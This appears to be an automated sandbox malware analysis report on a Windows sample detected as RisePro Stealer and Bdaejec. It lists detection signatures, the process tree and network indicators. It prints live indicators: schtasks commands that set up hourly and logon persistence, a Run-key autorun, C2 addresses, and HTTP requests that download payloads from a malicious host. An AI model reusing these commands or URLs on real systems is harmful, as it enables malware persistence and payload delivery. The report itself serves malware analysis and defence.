Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_37.exe

Overview

General Information

Sample name:	Lisect_AVT_24003_G1A_37.exe
Analysis ID:	1481140
MD5:	6a672bbdc7865a7518441284d853f8d8
SHA1:	be887b22a197194e90f9a090174f258bdb062562
SHA256:	a3f809a16001f7edea3b2c946286c80db82531a8cd037320fba6cf8bbcf68284
Tags:	exe
Infos:

Detection

Bdaejec, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

Yara detected RisePro Stealer

AI detected suspicious sample

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

Lisect_AVT_24003_G1A_37.exe (PID: 3712 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe" MD5: 6A672BBDC7865A7518441284D853F8D8)

MlpxPf.exe (PID: 1840 cmdline: C:\Users\user\AppData\Local\Temp\MlpxPf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 5784 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4940 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH131.exe (PID: 6312 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 6A672BBDC7865A7518441284D853F8D8)

MPGPH131.exe (PID: 1304 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 6A672BBDC7865A7518441284D853F8D8)

RageMP131.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 6A672BBDC7865A7518441284D853F8D8)

MlpxPf.exe (PID: 7588 cmdline: C:\Users\user\AppData\Local\Temp\MlpxPf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: Lisect_AVT_24003_G1A_37.exe PID: 3712	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MlpxPf.exe PID: 1840	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: MPGPH131.exe PID: 6312	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MPGPH131.exe PID: 1304	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RageMP131.exe PID: 7572	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MlpxPf.exe PID: 7588	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe, ProcessId: 3712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.8 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:53:12.283927+0200
SID:	2838522
Source Port:	63806
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:42.698687+0200
SID:	2807908
Source Port:	49722
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:25.674940+0200
SID:	2046269
Source Port:	49712
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:20.335736+0200
SID:	2046269
Source Port:	49706
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:36.849216+0200
SID:	2046269
Source Port:	49719
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:22.721123+0200
SID:	2049060
Source Port:	49713
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:30.531280+0200
SID:	2807908
Source Port:	49717
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:17.362336+0200
SID:	2049060
Source Port:	49706
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:12.855208+0200
SID:	2807908
Source Port:	49704
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:36.819100+0200
SID:	2807908
Source Port:	49720
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:16.800194+0200
SID:	2807908
Source Port:	49705
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.8

Timestamp:	2024-07-25T04:53:27.676877+0200
SID:	2022930
Source Port:	443
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:39.900149+0200
SID:	2807908
Source Port:	49721
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.8

Timestamp:	2024-07-25T04:54:05.326511+0200
SID:	2022930
Source Port:	443
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.8 - Destination IP: 20.189.173.22

Timestamp:	2024-07-25T04:53:23.435986+0200
SID:	2028371
Source Port:	49711
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.8 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:53:33.718695+0200
SID:	2807908
Source Port:	49718
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.8 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T04:53:25.690426+0200
SID:	2046269
Source Port:	49713
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Lisect_AVT_24003_G1A_37.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarY	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar=6	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarH	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rarq	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar66	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar#7	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar.7	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarS6	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rart	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rarcC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rark	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MPGPH131\MPGPH131.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: Lisect_AVT_24003_G1A_37.exe	ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_37.exe	Virustotal: Detection: 84%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Lisect_AVT_24003_G1A_37.exe

Joe Sandbox ML: detected

Source: Lisect_AVT_24003_G1A_37.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_003529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		2_2_003529E2
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_005929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		18_2_005929E2

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Code function: 2_2_00352B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00352B8C

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 799

Source: global traffic	TCP traffic: 192.168.2.8:49704 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.8:49706 -> 193.233.132.62:50500

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Code function: 0_2_0028DB60 recv,WSAStartup,closesocket,socket,connect,closesocket,

0_2_0028DB60

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: MlpxPf.exe, 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000002.00000003.1447308888.0000000001120000.00000004.00001000.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000012.00000003.1617245966.0000000001380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar.7
Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar66
Source: MlpxPf.exe, 00000012.00000003.1624031200.00000000012B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar#7
Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar=6
Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarS6
Source: MlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rart
